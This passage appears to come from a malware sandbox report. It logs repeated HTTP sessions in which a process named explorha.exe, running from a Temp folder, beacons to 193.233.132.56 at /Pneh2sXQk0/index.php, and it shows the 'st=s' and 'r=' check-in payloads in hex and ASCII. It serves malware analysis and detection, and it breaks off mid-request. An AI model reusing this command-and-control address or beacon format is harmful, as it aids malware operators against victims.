                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:47.009947062 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
35   192.168.2.5   49823   193.233.132.56   80   4484   C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp   Bytes transferred   Direction   Data
Apr 19, 2024 03:29:47.367412090 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:47.616369009 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.618335009 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.873434067 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      36 | 192.168.2.5 | 49824 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.233275890 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.482053995 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.483079910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.737075090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      37 | 192.168.2.5 | 49828 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.100488901 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.348460913 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.349280119 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.603646040 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      38 | 192.168.2.5 | 49829 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.955645084 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.198474884 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.199327946 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:50.447232962 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49832 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:50.847054958 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:51.094971895 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:51.104715109 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:51.357671976 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49836 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:51.728240013 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:51.976005077 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:51.977514029 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:52.229557991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49839 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:52.583226919 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:52.831265926 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:52.832276106 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:53.082236052 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49845 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:53.539917946 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:53.788292885 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:53.791858912 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:54.046080112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49848 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:54.485090017 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:54.734884977 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:54.735728979 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
